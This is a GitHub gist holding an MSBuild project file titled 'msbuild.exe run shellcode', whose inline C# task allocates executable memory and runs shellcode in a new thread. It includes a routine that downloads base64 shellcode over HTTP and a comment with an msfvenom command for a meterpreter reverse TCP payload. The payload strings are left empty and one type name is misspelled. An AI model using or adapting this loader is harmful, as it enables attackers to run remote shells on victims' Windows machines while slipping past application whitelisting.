Skip to content

Instantly share code, notes, and snippets.

@UserExistsError
Last active November 8, 2019 16:33
Show Gist options
  • Save UserExistsError/4741595c1b152a441d5aabfeb6bf6e21 to your computer and use it in GitHub Desktop.
Save UserExistsError/4741595c1b152a441d5aabfeb6bf6e21 to your computer and use it in GitHub Desktop.
msbuild.exe run shellcode
<!-- https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2017 -->
<!-- original work by @subTee on twitter -->
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<UsingTask TaskName="RunShellCode" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup />
<Task>
<Using Namespace="System" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Net;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Runtime.InteropServices;
public class RunShellCode: Task, ITask
/* https://docs.microsoft.com/en-us/dotnet/api/microsoft.build.framework.itask?view=netframework-4.7.2 */
{
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(UInt32 addr, UInt32 size, UInt32 flags, UInt32 protect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(UInt32 attrs, UInt32 stack, IntPtr start, UIn32 param, UInt32 flags, ref UInt32 tidPtr);
[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hThread, UInt32 dwWait);
private byte[] GetShellCodeHttp()
{
string url = "http://localhost:8000/";
if (System.Environment.Is64BitProcess)
url += "64";
else
url += "32";
Console.WriteLine("Requesting base64 shellcode from {0}", url);
WebRequest request = WebRequest.Create(url);
WebResponse response = request.GetResponse();
Stream stream = response.GetResponseStream();
StreamReader reader = new StreamReader(stream);
string shellcode = reader.ReadToEnd().Replace("\n", "").Replace("\r", "");
reader.Close();
response.Close();
return System.Convert.FromBase64String(shellcode);
}
private byte[] GetShellCode()
{
if (System.Environment.Is64BitProcess)
return System.Convert.FromBase64String("");
return System.Convert.FromBase64String("");
}
public override bool Execute()
{
/* will run 32 and 64 bit shellcode
msfvenom -f raw windows/x64/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 | base64 -w 0
*/
byte[] shellcode = GetShellCode();
Console.WriteLine(String.Format("Process bits: {0}", System.Environment.Is64BitProcess ? 64 : 32));
Console.WriteLine(String.Format("Shellcode length = {0}", shellcode.Length));
// allocate unmanaged memory buffer for our shellcode
IntPtr rwx = VirtualAlloc(0, (UInt32)shellcode.Length, 0x3000, 0x40);
Console.WriteLine(String.Format("Allocated memory at 0x{0:x}", rwx.ToInt64()));
// copy from bytes object to unmanaged memory
Marshal.Copy(shellcode, 0, rwx, shellcode.Length);
// create a new thread to target the shellcode
UInt32 tid = 0;
Console.WriteLine("Creating thread...");
IntPtr handle = CreateThread(0, 0, rwx, 0, 0, ref tid);
Console.WriteLine(String.Format("Waiting on thread 0x{0:x}", tid));
// wait for shellcode to exit
WaitForSingleObject(handle, 0xffffffff);
return false;
}
}
]]>
</Code>
</Task>
</UsingTask>
<Target Name="Run" >
<RunShellCode />
</Target>
</Project>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment